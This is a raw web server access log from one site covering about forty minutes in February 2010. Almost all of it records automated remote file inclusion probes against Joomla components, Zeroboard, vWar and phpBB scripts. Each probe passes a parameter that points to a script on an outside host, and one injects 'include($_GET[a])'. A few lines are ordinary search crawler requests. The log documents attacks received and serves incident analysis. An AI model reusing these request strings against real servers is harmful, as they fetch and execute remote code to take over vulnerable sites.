58.150.99.131 - - [12/Feb/2010:04:38:00 -0800] "GET /logs/access_100109.log//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:04:39:16 -0800] "GET /logs/access_100109.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:04:39:16 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:04:39:16 -0800] "GET /logs/access_100105.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:04:39:16 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:04:39:23 -0800] "GET //bbs/write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:04:39:23 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:04:39:23 -0800] "GET /logs/access_100203.log%20%20///bbs/write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:04:40:21 -0800] "GET /logs/access_100121.log%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.onroadzone.com/zboard/tmp/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:04:40:47 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ladies-in-nylon.com///fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:04:40:47 -0800] "GET /logs/access_100117.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ladies-in-nylon.com///fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:04:40:47 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ladies-in-nylon.com///fx29id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:04:41:27 -0800] "GET /logs/access_100204.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ladies-in-nylon.com///fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:04:41:40 -0800] "GET /logs/access_100121.log%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.onroadzone.com/zboard/tmp/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:04:41:45 -0800] "GET /?path%5Bdocroot%5D=http://www.ladies-in-nylon.com///fx29id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:04:41:49 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.ladies-in-nylon.com///fx29id1.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:04:41:50 -0800] "GET /logs/access_100123.log//?path%5Bdocroot%5D=http://www.ladies-in-nylon.com///fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:04:41:57 -0800] "GET /logs/access_100107.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://hep.or.kr//tc/skin/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:04:41:58 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://hep.or.kr//tc/skin/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:04:42:00 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://hep.or.kr//tc/skin/img00.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:04:42:25 -0800] "GET /logs/access_100104.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://hep.or.kr//tc/skin/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [12/Feb/2010:04:43:52 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [12/Feb/2010:04:43:52 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [12/Feb/2010:04:43:53 -0800] "GET /logs/access_100123.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:04:44:47 -0800] "GET //vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:04:44:47 -0800] "GET /logs///vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:04:44:47 -0800] "GET /logs/access_100107.log///vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:04:44:57 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:04:44:57 -0800] "GET /logs/access_100203.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:04:44:57 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:04:45:23 -0800] "GET /logs/access_100105.log///vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:04:45:35 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:04:45:35 -0800] "GET /logs/access_100203.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:04:45:35 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:04:45:59 -0800] "GET /logs/access_100123.log%20%20//?path%5Bdocroot%5D=http://www.ladies-in-nylon.com///fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [12/Feb/2010:04:46:01 -0800] "GET /logs/access_100115.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:04:46:04 -0800] "GET /logs/access_100121.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.onroadzone.com/zboard/tmp/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:04:46:13 -0800] "GET /logs/access_100122.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.onroadzone.com/zboard/tmp/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:04:47:04 -0800] "GET /logs/access_100115.log%20%20//?path%5Bdocroot%5D=http://www.ladies-in-nylon.com///fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:04:47:08 -0800] "GET /logs/access_100121.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.onroadzone.com/zboard/tmp/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:04:47:16 -0800] "GET /logs/access_100122.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.onroadzone.com/zboard/tmp/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:04:47:40 -0800] "GET /logs///vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:04:47:40 -0800] "GET //vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:04:47:40 -0800] "GET /logs/access.log///vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:04:48:59 -0800] "GET //vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:04:48:59 -0800] "GET /logs///vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:04:48:59 -0800] "GET /logs/access_100107.log%20%20///vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:04:49:51 -0800] "GET /logs/access_100107.log///vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.73.56.64 - - [12/Feb/2010:04:50:07 -0800] "GET /logs/access_100119.log//components/com_flyspray/startdown.php?file=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.73.56.64 - - [12/Feb/2010:04:50:07 -0800] "GET /components/com_flyspray/startdown.php?file=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.73.56.64 - - [12/Feb/2010:04:50:07 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:04:50:23 -0800] "GET /logs///vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:04:50:23 -0800] "GET //vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:04:50:23 -0800] "GET /logs/access_100125.log///vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:04:50:23 -0800] "GET /logs/access_100104.log///vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.73.56.64 - - [12/Feb/2010:04:50:51 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.73.56.64 - - [12/Feb/2010:04:50:51 -0800] "GET /components/com_flyspray/startdown.php?file=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.73.56.64 - - [12/Feb/2010:04:50:51 -0800] "GET /logs/access_100119.log//components/com_flyspray/startdown.php?file=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:04:51:01 -0800] "GET /logs/access_100117.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ladies-in-nylon.com///fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [12/Feb/2010:04:51:29 -0800] "GET /logs/access_091020.log HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [12/Feb/2010:04:51:29 -0800] "GET /style/polstandard.css HTTP/1.0" 200 5623 "http://www.puaga.com/logs/access_091020.log" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:04:51:30 -0800] "GET /logs/access_100107.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ladies-in-nylon.com///fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.73.56.64 - - [12/Feb/2010:04:52:51 -0800] "GET /logs/access_100119.log%20%20//components/com_flyspray/startdown.php?file=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.73.56.64 - - [12/Feb/2010:04:52:51 -0800] "GET /components/com_flyspray/startdown.php?file=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.73.56.64 - - [12/Feb/2010:04:52:51 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.73.56.64 - - [12/Feb/2010:04:52:55 -0800] "GET /logs/access_100201.log//components/com_flyspray/startdown.php?file=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.73.56.64 - - [12/Feb/2010:04:53:29 -0800] "GET /logs/access_100201.log%20%20//components/com_flyspray/startdown.php?file=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:04:56:30 -0800] "GET /logs///vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:04:56:30 -0800] "GET /logs/access_100107.log%20%20///vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:04:56:31 -0800] "GET //vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.174.234.119 - - [12/Feb/2010:04:57:42 -0800] "GET /logs/access_081204.log HTTP/1.0" 404 5258 "http://www.puaga.com/logs/access_081204.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "www.puaga.com"
165.132.30.11 - - [12/Feb/2010:04:59:28 -0800] "GET /logs/access_100107.log%20%20///vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [12/Feb/2010:04:59:29 -0800] "GET //vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [12/Feb/2010:04:59:29 -0800] "GET /logs///vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [12/Feb/2010:05:00:20 -0800] "GET /logs/access_100114.log%20%20///vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [12/Feb/2010:05:02:16 -0800] "GET /logs/access_100107.log%20%20///vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [12/Feb/2010:05:02:16 -0800] "GET //vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [12/Feb/2010:05:02:16 -0800] "GET /logs///vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:05:03:23 -0800] "GET //vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:05:03:27 -0800] "GET /logs///vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:05:03:27 -0800] "GET /logs/access_100125.log%20%20///vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:05:03:27 -0800] "GET /logs/access_100104.log%20%20///vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [12/Feb/2010:05:04:44 -0800] "GET /logs/access_100114.log%20%20///vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:05:05:58 -0800] "GET /logs/access_100104.log%20%20///vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:05:05:58 -0800] "GET /logs/access_100125.log%20%20///vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:05:05:59 -0800] "GET /logs///vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:07:54 -0800] "GET //delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:07:54 -0800] "GET /logs/access_100130.log%20%20///delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:07:54 -0800] "GET /logs///delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:08:01 -0800] "GET /logs/access_100130.log%20%20///delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:08:01 -0800] "GET /logs///delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:08:01 -0800] "GET //delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [12/Feb/2010:05:09:29 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [12/Feb/2010:05:09:29 -0800] "GET /logs/access_100119.log%20%20//include/admin.lib.inc.php?site_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [12/Feb/2010:05:09:29 -0800] "GET /include/admin.lib.inc.php?site_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:09:48 -0800] "GET /logs/access_100125.log%20%20///delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:09:57 -0800] "GET /logs/access_100125.log%20%20///delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [12/Feb/2010:05:09:57 -0800] "GET /include/admin.lib.inc.php?site_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [12/Feb/2010:05:09:57 -0800] "GET /logs/access_100119.log%20%20//include/admin.lib.inc.php?site_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [12/Feb/2010:05:09:57 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [12/Feb/2010:05:10:47 -0800] "GET /logs/access_100129.log//bbs/write_update.php?board_skin_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [12/Feb/2010:05:10:47 -0800] "GET /logs/access_100202.log//bbs/write_update.php?board_skin_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [12/Feb/2010:05:10:47 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [12/Feb/2010:05:10:47 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [12/Feb/2010:05:12:24 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "www.puaga.com"
38.101.148.126 - - [12/Feb/2010:05:12:24 -0800] "GET /ideal/forum/viewtopic.php?p=29025 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "www.puaga.com"
195.184.217.50 - - [12/Feb/2010:05:12:56 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [12/Feb/2010:05:12:56 -0800] "GET /include/admin.lib.inc.php?site_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [12/Feb/2010:05:12:56 -0800] "GET /logs/access_100119.log//include/admin.lib.inc.php?site_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.73.56.64 - - [12/Feb/2010:05:13:03 -0800] "GET /modules/xfsection/modify.php?dir_module=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.73.56.64 - - [12/Feb/2010:05:13:03 -0800] "GET /logs/access_100208.log//modules/xfsection/modify.php?dir_module=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.73.56.64 - - [12/Feb/2010:05:13:03 -0800] "GET /logs/access_100204.log//modules/xfsection/modify.php?dir_module=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.73.56.64 - - [12/Feb/2010:05:13:03 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:05:15:16 -0800] "GET /logs/access_100130.log%20%20///delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:05:15:16 -0800] "GET //delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
